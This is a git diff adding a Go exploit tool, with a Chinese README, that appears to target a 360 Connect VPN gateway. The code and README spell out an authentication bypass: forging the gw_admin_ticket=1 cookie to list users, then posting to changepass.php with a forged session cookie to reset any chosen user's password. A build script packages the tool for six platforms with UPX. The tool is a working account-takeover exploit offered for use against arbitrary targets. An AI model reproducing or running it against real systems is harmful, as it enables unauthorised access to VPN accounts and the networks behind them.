diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..723ef36 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.idea \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..cf1fe3e --- /dev/null +++ b/README.md @@ -0,0 +1,54 @@ +# 1.**复现** + +1.使用cookie editor插件添加cookie值gw\_admin\_ticket为1. + +![](pics/1.png) + +2.使用charset插件修改网页编码为utf-8使页面正常显示 + +![](pics\2.png) + +3.获取到用户名信息. + +![](pics\3.png) + +4.使用hackbar对地址/changepass.php?type=2发送修改密码数据,并将cookie值修改为如下,this_name为你需要修改密码的用户名称. + +![](pics\4.png) + +![](pics\5.png) + +5.返回修改密码成功.可能会提示密码强度不够可以尝试随机生成字符串来生成。 + +![](pics\6.png) + +# 2.工具使用 + +1.下载对应系统版本工具 + +```shell +./VPN_linux_amd64 -h +Usage of /tmp/go-build2269393005/b001/exe/main: + -c check target vuln.(default) (default true) + -e change user's password. + -p string + manual set password you want change.(default is generate by random.) (default "BpLnfgDsc3WD") + -t int + request timeout default is 5 second. (default 5) + -u string + target you want fuck.(example:https://xxxxx:xxx) + +``` + +2.参数介绍 + +| 参数 | 含义 | +| ---- | ----------------------------------------------------- | +| c | 检测模块,默认启用,存在漏洞的话会输出目标的用户列表. | +| e | 修改密码模块,默认不启用. | +| p | 更改后的密码,默认随机生成. | +| t | 请求超时时间,默认为5s. | +| u | 需要检测的目标url地址,. | + + + diff --git a/build.sh b/build.sh new file mode 100644 index 0000000..ef1e3d8 --- /dev/null +++ b/build.sh @@ -0,0 +1,29 @@ +export LDFLAGS='-s -w ' + +CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_linux_amd64 main.go +CGO_ENABLED=0 GOOS=windows GOARCH=386 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_386.exe main.go +CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_amd64.exe main.go +CGO_ENABLED=0 GOOS=windows GOARCH=arm64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_arm64.exe main.go +CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_darwin_amd64 main.go +CGO_ENABLED=0 GOOS=darwin GOARCH=arm64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_darwin_arm64 main.go + +upx -9 VPN_linux_amd64 +upx -9 VPN_windows_386.exe +upx -9 VPN_windows_amd64.exe +upx -9 VPN_windows_arm64.exe +upx -9 VPN_darwin_amd64 +upx -9 VPN_darwin_arm64 + +zip VPN_linux_amd64.zip VPN_linux_amd64 config.yaml +zip VPN_windows_386.zip VPN_windows_386.exe config.yaml +zip VPN_windows_amd64.zip VPN_windows_amd64.exe config.yaml +zip VPN_windows_arm64.zip VPN_windows_arm64.exe config.yaml +zip VPN_darwin_amd64.zip VPN_darwin_amd64 config.yaml +zip VPN_darwin_arm64.zip VPN_darwin_arm64 config.yaml + +rm -f VPN_linux_amd64 +rm -f VPN_windows_386.exe +rm -f VPN_windows_amd64.exe +rm -f VPN_windows_arm64.exe +rm -f VPN_darwin_amd64 +rm -f VPN_darwin_arm64 \ No newline at end of file diff --git a/go.mod b/go.mod new file mode 100644 index 0000000..8a159a7 --- /dev/null +++ b/go.mod @@ -0,0 +1,11 @@ +module 360ConnectTool + +go 1.20 + +require github.com/go-resty/resty/v2 v2.7.0 + +require ( + github.com/PuerkitoBio/goquery v1.8.1 // indirect + github.com/andybalholm/cascadia v1.3.2 // indirect + golang.org/x/net v0.10.0 // indirect +) diff --git a/go.sum b/go.sum new file mode 100644 index 0000000..6a679bf --- /dev/null +++ b/go.sum @@ -0,0 +1,49 @@ +github.com/PuerkitoBio/goquery v1.8.1 h1:uQxhNlArOIdbrH1tr0UXwdVFgDcZDrZVdcpygAcwmWM= +github.com/PuerkitoBio/goquery v1.8.1/go.mod h1:Q8ICL1kNUJ2sXGoAhPGUdYDJvgQgHzJsnnd3H7Ho5jQ= +github.com/andybalholm/cascadia v1.3.1/go.mod h1:R4bJ1UQfqADjvDa4P6HZHLh/3OxWWEqc0Sk8XGwHqvA= +github.com/andybalholm/cascadia v1.3.2 h1:3Xi6Dw5lHF15JtdcmAHD3i1+T8plmv7BQ/nsViSLyss= +github.com/andybalholm/cascadia v1.3.2/go.mod h1:7gtRlve5FxPPgIgX36uWBX58OdBsSS6lUvCFb+h7KvU= +github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= +github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= +github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= +golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= +golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210916014120-12bc252f5db8/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20211029224645-99673261e6eb h1:pirldcYWx7rx7kE5r+9WsOXPXK0+WH5+uZ7uPmJ44uM= +golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= +golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= +golang.org/x/net v0.7.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= +golang.org/x/net v0.9.0/go.mod h1:d48xBJpPfHeWQsugry2m+kC02ZBRGRgulfHnEXEuWns= +golang.org/x/net v0.10.0 h1:X2//UzNDwYmtCLn7To6G58Wr6f5ahEAQgKNzv9Y951M= +golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= +golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= +golang.org/x/term v0.5.0/go.mod h1:jMB1sMXY+tzblOD4FWmEbocvup2/aLOaQEp7JmGp78k= +golang.org/x/term v0.7.0/go.mod h1:P32HKFT3hSsZrRxla30E9HqToFYAQPCMs/zFMBUFqPY= +golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= +golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= +golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= +golang.org/x/text v0.9.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= +golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= +golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= +golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= +golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= diff --git a/main.go b/main.go new file mode 100644 index 0000000..4dc9afa --- /dev/null +++ b/main.go @@ -0,0 +1,7 @@ +package main + +import "360ConnectTool/module" + +func main() { + module.V.Run() +} diff --git a/module/init.go b/module/init.go new file mode 100644 index 0000000..83f2c3c --- /dev/null +++ b/module/init.go @@ -0,0 +1,36 @@ +package module + +import ( + "flag" + "fmt" + "log" + "net/url" +) + +var ( + V vpnConnect + getUserListPath = "/admin/group/x_group.php?id=1" + changePasswordPath = "/changepass.php?type=2" + password string +) + +func (v *vpnConnect) init() { + flag.StringVar(&v.target, "u", "", "target you want fuck.(example:https://xxxxx:xxx)") + flag.IntVar(&v.timeout, "t", 5, "request timeout default is 5 second.") + flag.BoolVar(&v.check, "c", true, "check target vuln.(default)") + flag.BoolVar(&v.change, "e", false, "change user's password.") + flag.StringVar(&password, "p", v.generatePassword(), "manual set password you want change.(default is generate by random.)") + flag.Parse() + v.isVul = false + if v.target == "" { + log.SetPrefix("[-] ") + log.Fatalln("give me a valid target url") + } else { + u, err := url.Parse(v.target) + if err != nil { + log.SetPrefix("[-] ") + log.Fatalln(err) + } + v.target = fmt.Sprintf("%s://%s", u.Scheme, u.Host) + } +} diff --git a/module/module.go b/module/module.go new file mode 100644 index 0000000..bd95570 --- /dev/null +++ b/module/module.go @@ -0,0 +1,12 @@ +package module + +type vpnConnect struct { + target string + users []string + canGetUser bool + isVul bool + timeout int + check bool + change bool + cookie string +} diff --git a/module/utils.go b/module/utils.go new file mode 100644 index 0000000..f851731 --- /dev/null +++ b/module/utils.go @@ -0,0 +1,28 @@ +package module + +import ( + "fmt" + "math/rand" + "strings" +) + +func (v vpnConnect) generatePassword() string { + charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" + sb := strings.Builder{} + sb.Grow(16) + for i := 0; i < 12; i++ { + sb.WriteByte(charset[rand.Intn(len(charset))]) + } + return sb.String() +} +func (v vpnConnect) showUserList() { + for k, v := range v.users { + fmt.Printf("%d.%s ", k, v) + if k == 0 { + continue + } else if k%8 == 0 { + fmt.Println() + } + } + fmt.Println() +} diff --git a/module/vpn.go b/module/vpn.go new file mode 100644 index 0000000..190e1a8 --- /dev/null +++ b/module/vpn.go @@ -0,0 +1,89 @@ +package module + +import ( + "crypto/tls" + "fmt" + "github.com/PuerkitoBio/goquery" + "github.com/go-resty/resty/v2" + "log" + "net/http" + "strings" + "time" +) + +func (v *vpnConnect) getUserList() { + headers := map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"} + headers["cookie"] = "gw_admin_ticket=1" + v.users = make([]string, 0) + client := resty.New() + client.SetHeaders(headers) + client.SetBaseURL(v.target) + client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) + client.SetTimeout(time.Duration(v.timeout) * time.Second) + resp, err := client.R().Get(getUserListPath) + if err != nil { + log.SetPrefix("[-] ") + log.Fatalln(err) + } + dom, err := goquery.NewDocumentFromReader(strings.NewReader(string(resp.Body()))) + if err != nil { + log.SetPrefix("[-] ") + log.Fatalln(err) + } + if !strings.Contains(string(resp.Body()), "用户信息") { + log.SetPrefix("[-] ") + log.Fatalln("target may secure.") + } + log.SetPrefix("[*] ") + log.Println("Try To Get Target's User List.") + dom.Find("#user_unsel > option").Each( + func(i int, selection *goquery.Selection) { + v.users = append(v.users, strings.Split(selection.Text(), "->")[1]) + }) + log.SetPrefix("[*] ") + log.Println("Target User List Got It.") + log.Printf("Target Have %d User.\n", len(v.users)) + v.canGetUser = true + v.cookie = resp.Cookies()[0].Value +} +func (v *vpnConnect) changePassword() { + v.showUserList() + var index int + fmt.Print("[!] Give A Num of User That You Want To Change Password:") + fmt.Scanf("%d\n", &index) + log.SetPrefix("[*] ") + log.Printf("Trying To Change User %s's Password.", v.users[index]) + headers := map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded"} + headers["cookie"] = fmt.Sprintf(`PHPSESSID=%s;gw_user_ticket=ffffffffffffffffffffffffffffffff; user_lang_id=2; last_step_param={"this_name": "%s","subAuthId": "1"}`, v.cookie, v.users[index]) + client := resty.New() + client.SetHeaders(headers) + client.SetBaseURL(v.target) + client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) + client.SetTimeout(time.Duration(v.timeout) * time.Second) + body := fmt.Sprintf(`password=%s&repassword=%s&vcode=&old_pass=`, password, password) + resp, err := client.R().SetBody(body).Post(changePasswordPath) + if err != nil { + log.SetPrefix("[-] ") + log.Fatalln(err) + } + if resp.StatusCode() == http.StatusOK && strings.Contains(string(resp.Body()), "修改密码成功") { + log.SetPrefix("[!] ") + log.Printf("User %s's Password Change To %s", v.users[index], password) + } else { + log.SetPrefix("[!] ") + dom, err := goquery.NewDocumentFromReader(strings.NewReader(string(resp.Body()))) + if err != nil { + log.SetPrefix("[-] ") + log.Fatalln(err) + } + log.SetPrefix("[!] ") + log.Fatalln(dom.Find(".main_font").Text()) + } +} +func (v *vpnConnect) Run() { + v.init() + v.getUserList() + if v.change { + v.changePassword() + } +} diff --git a/pics/1.png b/pics/1.png new file mode 100644 index 0000000..3c7a15c Binary files /dev/null and b/pics/1.png differ diff --git a/pics/2.png b/pics/2.png new file mode 100644 index 0000000..c562299 Binary files /dev/null and b/pics/2.png differ diff --git a/pics/3.png b/pics/3.png new file mode 100644 index 0000000..364546c Binary files /dev/null and b/pics/3.png differ diff --git a/pics/4.png b/pics/4.png new file mode 100644 index 0000000..56cf1ba Binary files /dev/null and b/pics/4.png differ diff --git a/pics/5.png b/pics/5.png new file mode 100644 index 0000000..992551a Binary files /dev/null and b/pics/5.png differ diff --git a/pics/6.png b/pics/6.png new file mode 100644 index 0000000..e2dda2d Binary files /dev/null and b/pics/6.png differ